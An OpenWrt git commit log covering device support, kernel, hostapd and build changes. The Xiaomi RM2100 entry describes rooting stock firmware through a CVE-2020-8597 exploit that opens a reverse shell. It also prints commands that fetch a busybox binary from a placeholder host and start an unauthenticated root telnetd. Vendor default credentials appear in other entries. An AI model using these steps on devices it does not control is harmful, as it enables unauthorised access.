aboutsummaryrefslogtreecommitdiffstats
Commit message (Collapse)AuthorAgeFilesLines
* scripts/flashing/flash.sh: remove trailing whitespacesRosen Penev2020-05-241-4/+4
| | | | | | Signed-off-by: Rosen Penev <rosenp@gmail.com> [cut out of patch with different subject] Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
* scripts/flashing/flash.sh: Add missing quotesRosen Penev2020-05-241-5/+5
| | | | | | | | | These are in if statements (where they should be), and echo output that is not piped to anything. These should be safe. Found with shellcheck. Signed-off-by: Rosen Penev <rosenp@gmail.com>
* ath79/nand: add support for Netgear WNDR4300SWStijn Segers2020-05-245-0/+24
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | This patch adds support for the WNDR4300SW, marketed by California ISP SureWest (hence the 'SW' suffix). Hardware wise, it's identical to the WNDR4300 v1. Specifications: * SoC: Atheros AR9344 * RAM: 128 MB * Flash: 128 MB NAND flash * WiFi: Atheros AR9580 (5 GHz) and AR9344 (2,4 GHz) * Ethernet: 5x 1000Base-T * LED: Power, WAN, LAN, WiFi, USB, WPS * UART: on board, to the right of the RF shield at the top of the board Installation: * Flashing through the OEM web interface: + Connect your computer to the router with an ethernet cable and browse to http://192.168.1.1/ + Log in with the default credentials are admin:password + Browse to Advanced > Administration > Firmware Upgrade in the Netgear interface + Upload the Openwrt firmware: openwrt-ath79-nand-netgear_wndr4300sw-squashfs-factory.img + Proceed with the firmware installation and give the device a few minutes to finish and reboot. * Flashing through TFTP: + Configure your wired client with a static IP in the 192.168.1.x range, e.g. 192.168.1.10 and netmask 255.255.255.0. + Power off the router. + Press and hold the RESET button (the factory reset button on the bottom of the device, with the red circle around it) and turn the router on while keeping the button pressed. + The power LED will start flashing orange. You can release the button once it switches to flashing green. + Transfer the image over TFTP: $ tftp 192.168.1.1 -m binary -c put openwrt-ath79-nand-netgear_wndr4300sw-squashfs-factory.img Signed-off-by: Stijn Segers <foss@volatilesystems.org>
* squashfs: Fix compile with GCC 10Hauke Mehrtens2020-05-241-0/+25
| | | | | | | | | Fixes the following build error with GCC 10: /usr/bin/ld: read_fs.o:(.bss+0x0): multiple definition of `swap'; mksquashfs.o:(.bss+0x1b2a88): first defined here And a compile warning. Fixes: FS#3104, FS#3119 Signed-off-by: Hauke Mehrtens <hauke@hauke-m.de>
* usign: update to latest git HEADMatthias Schiffer2020-05-231-3/+3
| | | | | | f1f65026a941 Always pad fingerprints to 16 characters Signed-off-by: Matthias Schiffer <mschiffer@universe-factory.net>
* ramips: fix 04_led_migration case syntax for mt7621Russell Senior2020-05-231-1/+3
| | | | | | | | | | | | | Commit f761f4052c4 had bogus case syntax, the uci-defaults script threw errors as a result and exited non-zero, probably didn't do what was intended, but tried over and over since the non-zero exit prevents the script from being deleted. Fixes: f761f4052c41 ("ramips: mt7621: harmonize naming scheme for Mikrotik") Signed-off-by: Russell Senior <russell@personaltelco.net> [extend commit title, add Fixes] Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
* ath79: add support for Enterasys WS-AP3705iDavid Bauer2020-05-226-1/+261
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Hardware -------- SoC: Atheros AR9344 RAM: 128M DDR2 FLASH: 2x Macronix MX25L12845EM 2x 16MiB SPI-NOR WLAN2: Atheros AR9344 2x2 2T2R WLAN5: Atheros AR9580 2x2 2T2R SERIAL: Cisco-RJ45 on the back (115200 8n1) Installation ------------ The U-Boot CLI is password protected (using the same credentials as the OS). Default is admin/new2day. 1. Download the OpenWrt initramfs-image. Place it into a TFTP server root directory and rename it to 1401A8C0.img. Configure the TFTP server to listen at 192.168.1.66/24. 2. Connect the TFTP server to the access point. 3. Connect to the serial console of the access point. Attach power and interrupt the boot procedure when prompted (bootdelay is 1 second). 4. Configure the U-Boot environment for booting OpenWrt from Ram and flash: $ setenv boot_openwrt 'setenv bootargs; bootm 0xbf230000' $ setenv ramboot_openwrt 'setenv serverip 192.168.1.66; tftpboot 0x85000000; bootm' $ setenv bootcmd 'run boot_openwrt' $ saveenv 5. Load OpenWrt into memory: $ run ramboot_openwrt Wait for the image to boot. 6. Transfer the OpenWrt sysupgrade image to the device. Write the image to flash using sysupgrade: $ sysupgrade -n /path/to/openwrt-sysuograde.bin Signed-off-by: David Bauer <mail@david-bauer.net>
* hostapd: add WEP as queryable build featureDavid Bauer2020-05-221-0/+4
| | | | | | | | | | | Commit 472fd98c5b12 ("hostapd: disable support for Wired Equivalent Privacy by default") made support for WEP optional. Expose the WEP support to LuCi or other userspace tools using the existing interface. This way they are able to remove WEP from the available ciphers if hostapd is built without WEP support. Signed-off-by: David Bauer <mail@david-bauer.net>
* brcm63xx: add support for ADB P.DG A4001N A-000-1A1-AXDaniele Castro2020-05-226-0/+254
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | ADB P.DG A4001N A-000-1A1-AX a.k.a. Telecom Italia ADSL2+ Wi-Fi N (AGPWI) has the same PCB as the OpenWrt's ADB P.DG A4001N1 with LEDs connected to different GPIO PINs in active low configuration. OpenWrt's ADB P.DG A4001N image is made for the ADB P.DG A4001N A-000-1A1-AE. It has different LEDs configuration and flash size/layout w.r.t the ADB P.DG A4001N A-000-1A1-AX. Hardware: * Board ID: 96328avng * SoC: Broadcom BCM6328 * RAM DDR2-800: 32 Mbyte - winbond W9725G6KB-25 * Serial flash: 16 Mbyte - MXIC MX25L 12845EMI-10G * Ethernet: 4x Ethernet 10/100 baseT * Wifi 2.4GHz: Broadcom Corporation BCM43224/5 Wireless Network Adapter (rev 01) * LEDs: 2x Power, 2x ADSL, 2x Internet, 2x Wi-Fi, 2x Service * Buttons: 1x Reset, 1x WPS (named WiFi/LED) * UART: 1x TTL 115200n8, TX NC RX, on J5 connector (short R192 and R193) NC GND NC Installation via CFE: * Stock CFE has to be overwriten with one for 96328avng boards that can upload .bin images with no signature check (cfe-A4001N-V0000_96328avng.bin) * connect a serial port to the board * Stop the boot process after power on by pressing enter * set static IP 192.168.1.2 and subnet mask 255.255.255.0 * navigate to http://192.168.1.1/ * upload the OpenWrt image file Signed-off-by: Daniele Castro <danielecastro@hotmail.it> Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
* bcm63xx: use model part of board name as variable in 01_ledsAdrian Schmutzler2020-05-221-10/+11
| | | | | | | | This extracts the model part of the board name and uses it for the LED string identifiers in 01_leds. As this makes statements more generic, it will allow to merge more cases in the future. Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
* bcm63xx: replace further "ok" with "okay" in DTS filesAdrian Schmutzler2020-05-224-9/+9
| | | | | | | While "ok" is recognized in DT parsing, only "okay" is actually mentioned as valid value. Replace it accordingly. Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
* ath79: Do not build buffalo_whr-g301n by defaultHauke Mehrtens2020-05-211-0/+1
| | | | | | The squashfs partition is getting too big. Signed-off-by: Hauke Mehrtens <hauke@hauke-m.de>
* mac80211: Fix build on mpc85xx targetHauke Mehrtens2020-05-212-1/+32
| | | | | | | | | | | | | | | | | | | | | | | | | This fixes the following compile error seen on the mpc85xx target: CC [M] /linux-mpc85xx_p2020/backports-5.7-rc3-1/drivers/net/wireless/intersil/orinoco/main.o In file included from /builder/shared-workdir/build/staging_dir/toolchain-powerpc_8540_gcc-8.4.0_musl/include/stddef.h:17, from /linux-mpc85xx_p2020/backports-5.7-rc3-1/include/uapi/linux/wireless.h:77, from /linux-mpc85xx_p2020/backports-5.7-rc3-1/include/linux/wireless.h:13, from /linux-mpc85xx_p2020/backports-5.7-rc3-1/drivers/net/wireless/intersil/orinoco/main.c:89: /builder/shared-workdir/build/staging_dir/toolchain-powerpc_8540_gcc-8.4.0_musl/include/bits/alltypes.h:106:15: error: conflicting types for 'ptrdiff_t' typedef _Addr ptrdiff_t; ^~~~~~~~~ In file included from /linux-mpc85xx_p2020/backports-5.7-rc3-1/backport-include/linux/types.h:4, from ./include/linux/list.h:5, from /linux-mpc85xx_p2020/backports-5.7-rc3-1/backport-include/linux/list.h:3, from ./include/linux/module.h:9, from /linux-mpc85xx_p2020/backports-5.7-rc3-1/backport-include/linux/module.h:3, from /linux-mpc85xx_p2020/backports-5.7-rc3-1/drivers/net/wireless/intersil/orinoco/main.c:79: ./include/linux/types.h:65:28: note: previous declaration of 'ptrdiff_t' was here typedef __kernel_ptrdiff_t ptrdiff_t; ^~~~~~~~~ scripts/Makefile.build:265: recipe for target '/linux-mpc85xx_p2020/backports-5.7-rc3-1/drivers/net/wireless/intersil/orinoco/main.o' failed Fixes: 289c6324259e ("mac80211: Update to version 5.7-rc3-1") Signed-off-by: Hauke Mehrtens <hauke@hauke-m.de>
* firewall: add rule for traceroute supportPhilip Prindeville2020-05-211-0/+13
| | | | | | | | | | | | | | | | | Running your firewall's "wan" zone in REJECT zone (1) exposes the presence of the router, (2) depending on the sophistication of fingerprinting tools might identify the OS and release running on the firewall which then identifies known vulnerabilities with it and (3) perhaps most importantly of all, your firewall can be used in a DDoS reflection attack with spoofed traffic generating ICMP Unreachables or TCP RST's to overwhelm a victim or saturate his link. This rule, when enabled, allows traceroute to work even when the default input policy of the firewall for the wan zone has been set to DROP. Signed-off-by: Philip Prindeville <philipp@redfish-solutions.com>
* netifd: ingress/egress vlan qos mapping supportHans Dedecker2020-05-211-3/+3
| | | | | | 74e0222 vlandev: support setting ingress/egress QoS mappings Signed-off-by: Hans Dedecker <dedeckeh@gmail.com>
* bcm63xx: WIP: add Huawei HG253s v2 supportÁlvaro Fernández Rojas2020-05-216-0/+265
| | | | Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
* bcm63xx: nand: support CFE partition tagsÁlvaro Fernández Rojas2020-05-212-0/+22
| | | | | | | | Introduce support for generating JFFS2 CFE partition tags. This is used in NAND devices in order to verify the integrity of the JFFS2 partition. Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
* scripts: add CFE Partition Tags supportÁlvaro Fernández Rojas2020-05-211-0/+191
| | | | | | | | | | | | | Some BCM63xx NAND devices require a specific JFFS2 partition tag to verify the JFFS2 partition validity: u32 part_id; u32 part_size; u16 flags; char part_name[33]; char part_version[21]; u32 part_crc32; Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
* bcm63xx: improve rgmii ctrl overridesÁlvaro Fernández Rojas2020-05-2127-60/+84
| | | | | | | There are older devices which require overriding the RGMII ports, so this shouldn't be limited and forced to BCM63268. Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
* bcm63xx: dgnd3700-v1: add NAND supportÁlvaro Fernández Rojas2020-05-211-0/+26
| | | | | | | NAND is used as extra storage on this device. Signed-off-by: Daniel Gonzalez Cabanelas <dgcbueu@gmail.com> Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
* bcm63xx: nand: fix v2.1 controller supportÁlvaro Fernández Rojas2020-05-211-8/+40
| | | | | | Page size shift is different from v2.2+ controllers Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
* mac80211: Update to version 5.7-rc3-1Hauke Mehrtens2020-05-2124-297/+511
| | | | | | | | | | | This updates the mac80211 backport. The removed patches are already integrated in the upstream version. The 131-Revert-mac80211-aes-cmac-switch-to-shash-CMAC-driver.patch patch was manually adapted to the changes in kernel 5.7. Signed-off-by: Hauke Mehrtens <hauke@hauke-m.de>
* mac80211: Update to version 5.6.8-1Hauke Mehrtens2020-05-2138-1419/+58
| | | | | | | | This updates the mac80211 backport. The removed patches are already integrated in the upstream version. Signed-off-by: Hauke Mehrtens <hauke@hauke-m.de>
* mac80211: Update to version 5.5.19Hauke Mehrtens2020-05-2143-2899/+420
| | | | | | | | This updates the mac80211 backport. The removed patches are already integrated in the upstream version. Signed-off-by: Hauke Mehrtens <hauke@hauke-m.de>
* mac80211: Update to version 5.4.36-1Hauke Mehrtens2020-05-2117-198/+50
| | | | | | | | | This updates the mac80211 backport to the latest minor version. The removed patch was a backport from the upstream kernel which is now integrated. Signed-off-by: Hauke Mehrtens <hauke@hauke-m.de>
* kernel: backport the I2C bus recovery for uDPURussell King2020-05-211-0/+60
| | | | | | | Backport the I2C bus recovery DT configuration for the uDPU that has been queued for 5.8. Signed-off-by: Russell King <linux@armlinux.org.uk>
* kernel: backport v5.8 i2c-pxa updatesRussell King2020-05-2119-0/+1844
| | | | | | | Add i2c-pxa updates queued for v5.8, which add bus recovery to this driver; this is needed for the uDPU platform. Signed-off-by: Russell King <linux@armlinux.org.uk>
* kernel: backport gpio emulated open drain output fixRussell King2020-05-211-0/+45
| | | | | | | Backport the GPIO emulated open drain output fix from v5.5, which is required for the i2c-pxa backport. Signed-off-by: Russell King <linux@armlinux.org.uk>
* hostapd: bring back mesh patchesDaniel Golle2020-05-2128-108/+792
| | | | | | | | | | | | | Bring back 802.11s mesh features to the level previously available before the recent hostapd version bump. This is mostly to support use of 802.11s on DFS channels, but also making mesh forwarding configurable which is crucial for use of 802.11s MAC with other routing protocols, such as batman-adv, on top. While at it, fix new compiler warning by adapting 700-wifi-reload.patch to upstream changes, now building without any warnings again. Fixes: 0a3ec87a66 ("hostapd: update to latest Git hostap_2_9-1238-gdd2daf0848ed") Signed-off-by: Daniel Golle <daniel@makrotopia.org>
* wireguard: bump to 1.0.20200520Jason A. Donenfeld2020-05-211-2/+2
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | This version has the various slew of bug fixes and compat fixes and such, but the most interesting thing from an OpenWRT perspective is that WireGuard now plays nicely with cake and fq_codel. I'll be very interested to hear from OpenWRT users whether this makes a measurable difference. Usual set of full changes follows. This release aligns with the changes I sent to DaveM for 5.7-rc7 and were pushed to net.git about 45 minutes ago. * qemu: use newer iproute2 for gcc-10 * qemu: add -fcommon for compiling ping with gcc-10 These enable the test suite to compile with gcc-10. * noise: read preshared key while taking lock Matt noticed a benign data race when porting the Linux code to OpenBSD. * queueing: preserve flow hash across packet scrubbing * noise: separate receive counter from send counter WireGuard now works with fq_codel, cake, and other qdiscs that make use of skb->hash. This should significantly improve latency spikes related to buffer bloat. Here's a before and after graph from some data Toke measured: https://data.zx2c4.com/removal-of-buffer-bloat-in-wireguard.png * compat: support RHEL 8 as 8.2, drop 8.1 support * compat: support CentOS 8 explicitly * compat: RHEL7 backported the skb hash renamings The usual RHEL churn. * compat: backport renamed/missing skb hash members The new support for fq_codel and friends meant more backporting work. * compat: ip6_dst_lookup_flow was backported to 4.14, 4.9, and 4.4 The main motivation for releasing this now: three stable kernels were released at the same time, with a patch that necessitated updating in our compat layer. Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>
* hostapd: disable support for Wired Equivalent Privacy by defaultPetr Štetiar2020-05-212-0/+14
| | | | | | | | | | | | | | | | | | | Upstream in commit 200c7693c9a1 ("Make WEP functionality an optional build parameter") has made WEP functionality an optional build parameter disabled as default, because WEP should not be used for anything anymore. As a step towards removing it completely, they moved all WEP related functionality behind CONFIG_WEP blocks and disabled it by default. This functionality is subject to be completely removed in a future release. So follow this good security advice, deprecation notice and disable WEP by default, but still allow custom builds with WEP support via CONFIG_WPA_ENABLE_WEP config option till upstream removes support for WEP completely. Signed-off-by: Petr Štetiar <ynezz@true.cz>
* hostapd: update to latest Git hostap_2_9-1238-gdd2daf0848edPetr Štetiar2020-05-2147-1327/+262
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Bump package to latest upstream Git HEAD which is commit dd2daf0848ed ("HE: Process HE 6 GHz band capab from associating HE STA"). Since last update there was 1238 commits done in the upstream tree with 618 files changed, 53399 insertions, 24928 deletions. I didn't bothered to rebase mesh patches as the changes seems not trivial and I don't have enough knowledge of those parts to do/test that properly, so someone else has to forward port them, ideally upstream them so we don't need to bother anymore. I've just deleted them for now: 004-mesh-use-setup-completion-callback-to-complete-mesh-.patch 005-mesh-update-ssid-frequency-as-pri-sec-channel-switch.patch 006-mesh-inform-kernel-driver-DFS-handler-in-userspace.patch 007-mesh-apply-channel-attributes-before-running-Mesh.patch 011-mesh-Allow-DFS-channels-to-be-selected-if-dfs-is-ena.patch 013-mesh-do-not-allow-pri-sec-channel-switch.patch 015-mesh-do-not-use-offchan-mgmt-tx-on-DFS.patch 016-mesh-fix-channel-switch-error-during-CAC.patch 018-mesh-make-forwarding-configurable.patch Refreshed all other patches, removed upstreamed patches: 051-wpa_supplicant-fix-race-condition-in-mesh-mpm-new-pe.patch 067-0001-AP-Silently-ignore-management-frame-from-unexpected-.patch 070-driver_nl80211-fix-WMM-queue-mapping-for-regulatory-.patch 071-driver_nl80211-fix-regulatory-limits-for-wmm-cwmin-c.patch 090-wolfssl-fix-crypto_bignum_sum.patch 091-0001-wolfssl-Fix-compiler-warnings-on-size_t-printf-forma.patch 091-0002-wolfssl-Fix-crypto_bignum_rand-implementation.patch 091-0003-wolfssl-Do-not-hardcode-include-directory-in-wpa_sup.patch 800-usleep.patch Tested-by: Stefan Lippers-Hollmann <s.l-h@gmx.de> [ipq8065/NBG6817; ipq40xx/MAP-AC2200] Signed-off-by: Petr Štetiar <ynezz@true.cz>
* fuse: move package to packages feedRosen Penev2020-05-204-154/+0
| | | | | | | | | | This package was last updated in 2016. All of the dependent packages are in the packages feeds, where this will be moved. Ref: https://github.com/openwrt/packages/pull/12190 Signed-off-by: Rosen Penev <rosenp@gmail.com> [commit subject/description tweaks] Signed-off-by: Petr Štetiar <ynezz@true.cz>
* generic: platform/mikrotik: disambiguate SPDX-License-IdentifierThibaut VARÈNE2020-05-203-3/+3
| | | | | | I meant it to be GPL-2.0-only, as evidenced by the boilerplate. Signed-off-by: Thibaut VARÈNE <hacks@slashdirt.org>
* generic: routerbootpart.c: disambiguate SPDX-License-IdentifierThibaut VARÈNE2020-05-201-1/+1
| | | | | | I meant it to be GPL-2.0-only, as evidenced by the boilerplate. Signed-off-by: Thibaut VARÈNE <hacks@slashdirt.org>
* build: have config-clean deal with old temp filesEneas U de Queiroz2020-05-202-1/+11
| | | | | | | | | | This is a temporary commit to have 'make config-clean' remove temporary files from the previous scripts/config version. The .gitignore file is updated to deal with the old files as well. Cc: Kevin Darbyshire-Bryant <ldir@darbyshire-bryant.me.uk> Signed-off-by: Eneas U de Queiroz <cotequeiroz@gmail.com>
* build: add option to treat recursive deps as errorEneas U de Queiroz2020-05-201-5/+8
| | | | | | | | Running make with RECURSIVE_DEP_IS_ERROR=1 will cause a hard failure when a recursive dependency is detected. This is useful to apply stricter Ci tests, for example. Signed-off-by: Eneas U de Queiroz <cotequeiroz@gmail.com>
* build: scripts/config - update to kconfig-v5.6Eneas U de Queiroz2020-05-2038-4952/+7765
| | | | | | | | | | | | | | | | | | | | | Major changes include: - Much more readable reverse dependencies separated in groups - Improved recursive dependency report - More readable .config files: add comments to signal end of menus - More warnings for incorrect Config.in entries, such as a 'choice' default not contained in the 'choice' - Hability to properly display pseudographics with non-latin locales - Recursive dependencies can optionally be treated as errors Changes from failed dcf3e63a35d05e7e5103819c0f17195bfafe9baa attempt: - Recursive dependencies are treated as warnings by default - The option to treat them as errors is implemented as a command-line flag to scripts/config/conf instead of a compile-time definition - fixed handling of select with umnet dependencies Cc: Petr Štetiar <ynezz@true.cz> Cc: Jo-Philip Wich <jow@mein.io> Signed-off-by: Eneas U de Queiroz <cotequeiroz@gmail.com>
* sdk: add OpenWrt branding to menuconfig & .configEneas U de Queiroz2020-05-201-0/+2
| | | | | | | | | Set the mainmenu symbol in SDK Config.in to "OpenWrt Configuration", the same as the main OpenWrt Config.in. This string is is used as the name of the top menu in menuconfig, and at the top of the .config file. If unset, current kconfig will use "Linux Kernel Configuration". Signed-off-by: Eneas U de Queiroz <cotequeiroz@gmail.com>
* build: show make output in scripts/config when V=sEneas U de Queiroz2020-05-201-1/+2
| | | | | | This should make debugging build errors in scripts/config a bit easier. Signed-off-by: Eneas U de Queiroz <cotequeiroz@gmail.com>
* sdk: fix host menu config targets using ncursesEneas U de Queiroz2020-05-201-0/+1
| | | | | | | | | | | | | | This applies 965f341aa9 ("build: fix host menu config targets using ncurses") to the SDK top Makefile. If there is a pkg-config in the staging dir, it will try to use it instead of the host system's pkg-config; then it will fail to find the ncurses package. Linux's default will be used, which fails in some cases, such as recent Gentoo systems. Signed-off-by: Eneas U de Queiroz <cotequeiroz@gmail.com> [fixed From: to match SoB] Signed-off-by: Petr Štetiar <ynezz@true.cz>
* wolfssl: update to 4.4.0-stableEneas U de Queiroz2020-05-201-2/+2
| | | | | | | | | | | | This version adds many bugfixes, including a couple of security vulnerabilities: - For fast math (enabled by wpa_supplicant option), use a constant time modular inverse when mapping to affine when operation involves a private key - keygen, calc shared secret, sign. - Change constant time and cache resistant ECC mulmod. Ensure points being operated on change to make constant time. Signed-off-by: Eneas U de Queiroz <cotequeiroz@gmail.com>
* tools: add autoconf-archiveKarel Kočí2020-05-202-1/+29
| | | | | | | | | | | | | | | | Some autotools based build systems are using autoconf-archive scripts and are expecting them to almost always be available. This is not required for regular releases as tar balls generated for releases commonly have existing configure script. This is rather intended to be used with autotools.mk's autoreconf and in cases it is not always possible to get release tar ball. Including this adds little to no overhead in terms of build time as those are just m4 scripts copied to an appropriate location. Signed-off-by: Karel Kočí <karel.koci@nic.cz> [fixed From: to match SoB] Signed-off-by: Petr Štetiar <ynezz@true.cz>
* kernel: bump 5.4 to 5.4.42Petr Štetiar2020-05-2027-91/+65
| | | | | | | | | | | Refreshed patches, removed upstreamed patch: generic/pending: 001-v5.4-pinctrl-qcom-fix-wrong-write-in-update_dual_edge.patch.patch Run tested: qemu-x86-64 Build tested: x86/64, ath79/nand, imx6, sunxi/a53 Signed-off-by: Petr Štetiar <ynezz@true.cz>
* kernel: kmod-ptp-qoriq: Package kernel object fileJeffery To2020-05-201-2/+2
| | | | | | | This updates the package to contain the kernel object (.ko) file instead of the plain object (.o) file. Signed-off-by: Jeffery To <jeffery.to@gmail.com>
* x86: fix generic kernel 5.4 configAlberto Bursi2020-05-202-12/+13
| | | | | | | | | | | | | | The last kernel update done with commit 500a02bc29b9 ("x86: Update configuration") placed most of the updated config only in the x86_64 target. Move the options needed by the other targets too in the x86 base config, and add an additional option needed by those targets. Fixes: 500a02bc29b9 ("x86: Update configuration") Signed-off-by: Alberto Bursi <bobafetthotmail@gmail.com> [commit subject/description tweaks] Signed-off-by: Petr Štetiar <ynezz@true.cz>
* ramips: Add support for Xiaomi Redmi Router AC2100 (RM2100)Richard Huynh2020-05-206-3/+209
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Specification: - CPU: MediaTek MT7621A - RAM: 128 MB DDR3 - FLASH: 128 MB ESMT NAND - WIFI: 2x2 802.11bgn (MT7603) - WIFI: 4x4 802.11ac (MT7615) - ETH: 3xLAN+1xWAN 1000base-T - LED: Power, WAN, in Amber and White - UART: On board near ethernet, opposite side from power - Modified u-boot Installation: 1. Run linked exploit to get shell, startup telnet and wget the files over 2. mtd write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-kernel1.bin kernel1 3. nvram set uart_en=1 4. nvram set bootdelay=5 5. nvram set flag_try_sys1_failed=1 6. nvram commit 7. mtd -r write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-rootfs0.bin rootfs0 Restore to stock: 1. Setup PXE and TFTP server serving stock firmware image (See dhcp-boot option of dnsmasq) 2. Hold reset button down before powering on and wait for flashing amber led 3. Release reset button 4. Wait until status led changes from flashing amber to white Notes: This device has dual kernel and rootfs slots like other Xiaomi devices currently supported (mir3g, etc.) thus, we use the second slot and overwrite the first rootfs onwards in order to get more space. Exploit and detailed instructions: https://openwrt.org/toh/xiaomi/xiaomi_redmi_router_ac2100 An implementation of CVE-2020-8597 against stock firmware version 1.0.14 This requires a computer with ethernet plugged into the wan port and an active PPPoE session, and if successful will open a reverse shell to 192.168.31.177 on port 31337. As this shell is somewhat unreliable and likely to be killed in a random amount of time, it is recommended to wget a static compiled busybox binary onto the device and start telnetd with it. The stock telnetd and dropbear unfortunately appear inoperable. (Disabled on release versions of stock firmware likely) Ie. wget https://yourip/busybox-mipsel -O /tmp/busybox chmod a+x /tmp/busybox /tmp/busybox telnetd -l /bin/sh Tested-by: David Martinez <bonkilla@gmail.com> Signed-off-by: Richard Huynh <voxlympha@gmail.com>
* bcm63xx: lzma-loader: rely on CHIP_ID for UART addressÁlvaro Fernández Rojas2020-05-205-83/+32
| | | | | | | | lzma-loader uart output wasn't working on BCM3380/BCM6362 because these SoCs have the same processor ID. Let's use CHIP_ID for establishing the UART base address. Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
* bcm63xx: lzma-loader: remove unused definitionsÁlvaro Fernández Rojas2020-05-202-22/+1
| | | | Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
* bcm63xx: image: add CVG834G CHIP_IDÁlvaro Fernández Rojas2020-05-201-1/+1
| | | | Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>